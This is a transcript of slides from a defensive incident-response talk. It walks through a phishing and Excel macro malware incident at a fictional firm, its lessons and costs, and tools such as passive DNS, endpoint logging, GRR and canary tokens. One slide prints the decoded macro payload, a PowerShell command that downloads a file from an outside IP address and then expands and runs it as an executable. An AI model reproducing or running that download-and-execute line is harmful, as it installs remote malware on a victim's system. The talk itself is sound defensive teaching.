incident response in the wake of dear ceo
TRANSCRIPT
Up your Game
In the wake of Dear CEO
Who am I• Security Team Lead @ Logicalis Jersey
• Incorporated Engineer (IEng) / Chartered IT professional (CITP)
• Channel Island s Information Security Forum (CIISF) founder
• Secretary British Computer Society Jersey
• My role is a mixture of offense and defence for clients of all sizes and verticals including forensic malware investigations.
How we got here“We expect that registered persons will take appropriate steps to properly manage their cyber security arrangements”cyber-security arrangements”The Boards of Directors (or equivalent) of registered persons will take overall responsibility for ensuring that their firm adequately addresses cyber security risks A registered person should:
• Understand (and document) the risk of a cyber-attack on their business …
• Have in place appropriate contingency arrangements that they can deploy in the event of a cyber attack
• Review these matters and test their effectiveness
5 Key Questions – Incident Response
[1] Can we determine how many hosts and when they talked to the bad domain? How far can we go back in time to check /prove this?
[2] What information do we have available to us? Logs? Endpoint protection system?
[3] Did any of the affected hosts communicate with other network system. If they did, what occurred?
[4] How long did it take us to detect and remedy the incident
[5] What was the cost to the business?
Incident Response StagesPreparation
Incident
IdentificationEradication
Recovery
Lessons Learned Without information, you
cannot respond!!
The more information that you have the better your response.
Effective Incident response is about being able to pivot quickly and direct your response accordingly.
Meet Calculon Inc.
300
100 90Cayman = 50BVI = 50Time = - 5 hours
Jersey = 180Guernsey =100London = 20
HK = 40Kuala Lumpur = 30 Shanghai = 20Time = +8 hours
Preparation - Threat ModelThreat Vulnerability Impact Business
ImpactControls
Email Phishing Social Engineering
Possible Compromise
System rebuild LoggingAnti Virus
Malvertising Attack
Outdated Adobe Flash
Possible Compromise
System rebuild Ad BlockerAnti Virus
Web Attack against culculon.com
Vulnerability in web application stack
Website compromised
Reputational Loss
Keep website stack up to date
DDOS against Culculon.com
Insufficient bandwidth
Website not available
Minor reputational loss
Consider DDOS protection
Preparation - Cyber kill chain
“You only have to be fooled once, be slow in reacting, just once. How are you going to be sure to never make a mistake? You cant plan for that. That’s Life”
2016 2016Day 1 2 3 4 5 6 7
Phishing email received11/11/2016
System cleanup started11/11/2016
Systems cleanup completed11/14/2016
11/11/2016 Identify Infected systems
11/11/2016 Delete Citrix users profiles
11/11/2016 Disconnect infected systems from network
11/11/2016 - 11/14/2016 Rebuild infected systems
11/11/2016 Delete email from Exchange server
11/11/2016 Inform BVI/Cayman of the attack
11/14/2016 - 11/16/2016Reporting
11/17/2016Cost of incident
Incident – Malware Attack
Incident – Malware attackIt has code hidden in Excel spreadsheet
When decoded it becomes…..
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.
88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\
JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
VBA macro virus with hidden URL
Incident – Lessons Learned
[1] Insufficent logging available
[2] “Triage” took too long
[4] Volatile Forensic data lost
[3] Lack of support skills in outside UK locations
[5] USB / DLP / Drive Encryption made analysis difficult
[6] AV showed no infection / Incident response tools showed no malicious processes
[7] Reporting took too long
Incident 1 – Business Cost
25 who clicked email phishCitrix = 12Various Locations
Jersey,Guernsey and London
KL Calculon partner
HK Calculon senior executive
12 x Citrix Users - £150 per hour – 6 Hours = £3,600
9 x Citrix Users - £200 per hour – 10 Hours = £18,000
4 x Citrix Users - £400 per hour – 5 Hours = £8,000
IT support Costs = £2,000
Total Cost = £31,600
Improving Our Response – Passive DNS
https://blog.redcanary.com/2015/07/02/passive-dns-monitoring-your-ir-team-needs-it/
[1] Cheap to setup
[2] Use ‘Bro’ with Intel Critical Stack
https://nullsecure.org/building-your-own-passivedns-feed/
[3] Solves Question 1
Endpoint Logging[1] Level One
• User logins / logoff events• User Account creation, deletion and modification
[2] Level Two• Process creation / termination on systems• Use of sensitive privileges
[3] Must Have• Logs must be stored centrally – avoids anti forensics clearing of logs• Available for historic querying and hunting of suspicious activity
Endpoint Forensics[1] Directly examine the memory
• Not susceptible to malware tampering.• More information available – malware can’t hide.
[2] Scalability• We need to be able to ask questions of systems remotely.• Allows us to pivot and focus on what needs to “get done” in an incident.
[3] Memory Samples• Contain information as well as disk artefacts.• Existing “Live IR” tools are insufficient.
Threat Hunting = Endpoint Logging + Forensics + Netflow
ELK Stack Explained
ELK Demo
Google Rapid ResponseCross-platform support for Linux, Mac OS X and Windows clients.
Live remote memory analysis and imaging
Powerful search and download capabilities for files and the Windows registry.
Secure communication infrastructure designed for Internet deployment.
Detailed monitoring of client CPU, memory, IO usage and self-imposed limits
https://github.com/google/grr
Reporting / Compliance
https://github.com/certsocietegenerale/FIR
Python / Django Web Application
Open sourced by Societe Generale Incident Response Team
Customisable and freely available to you to record your incidents in.
GPL V3 licensed – You can make change for your own use.
Canaries, Tokens and Honey Hashes
Canary Token: Something you put on your network, if opened you get an email alert
Canary Device: A honeypot with an internet console that pretends to mimic something else that creates alerts when accessed.
Honey Hash: A fake NTLM password hash that you put in critical servers to detect Pass The Hash attacks.
Integrating SIEM into your response
Endpoint logging and forensics integrated via event collectors
Threat intelligence feeds directly integrated into SIEM
AV / Next gen AV supported
Passive DNS integrated
Bridging the skills gap
Forensic Images:http://www.forensicfocus.com/images-and-challenges
Volatility Framework: http://volatility-labs.blogspot.com/
Incident Response: http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
Questions
Can your organisation prevent, detect and respond to cyber security threats that you face?
In an incident could you answer the five key questions?
@cyberkryption